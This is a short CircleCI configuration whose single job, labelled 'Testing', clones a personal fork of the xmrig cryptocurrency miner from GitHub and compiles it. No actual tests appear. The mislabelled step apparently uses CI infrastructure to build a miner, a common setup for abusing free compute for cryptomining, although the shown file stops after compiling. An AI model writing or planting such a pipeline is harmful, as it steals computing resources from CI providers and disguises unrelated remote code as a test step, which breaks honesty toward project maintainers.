version: 2.1
jobs:
  build:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - checkout
      - run:
          name: "Testing"
          command: |
           sudo apt-get install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
           git clone https://github.com/Diaznr/xmrig.git
           mkdir xmrig/build && cd xmrig/build
           cmake ..
           make -j$(nproc)
 